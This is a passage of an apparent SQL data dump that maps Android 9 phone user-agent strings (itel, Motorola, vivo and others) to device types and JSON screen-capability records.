Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel L6501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W5005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W5505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W6002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W6002E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W6003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W6004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W6004P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel W6501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; m8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; meizu 16Xs) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":744,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; meizu M10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; meizu note9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto e(6) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto e(6s)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto e6 play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto e6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto e6s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(6) (XT1925DL)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(6) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(6) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(6)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(7) optimo maxx(XT1955DL)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(7) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(7) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":757,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(7) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(7) supra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(7)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":757,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(8) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(8) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto g(8) power lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":443,\"screenHeight\":985,\"pixelRatio\":1.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto z3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; moto z4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; motorola one action) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; motorola one macro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":235,\"screenHeight\":497,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; motorola one power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; motorola one vision) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; motorola one zoom) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; motorola one) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; myPhone_Fun_6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; myPhone_Pocket_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1723) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1725) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1727) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1804) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1805) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1806) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1813) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1819) AppleWebKit/* (KHTML, like Gecko) Chrome','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1902) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1904) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1906) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1907_19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1909) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1915) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1916) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1917) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1918) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 1951) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; vivo 2007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx 8 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx 9 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx 9 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx 9T Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx 9T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx A1) AppleWebKit/* (KHTML, like Gecko) Chrome','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx A2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx A2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx A2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx MIX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx MIX 2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx MIX 3 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx MIX 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx Max 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":540,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; xx Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 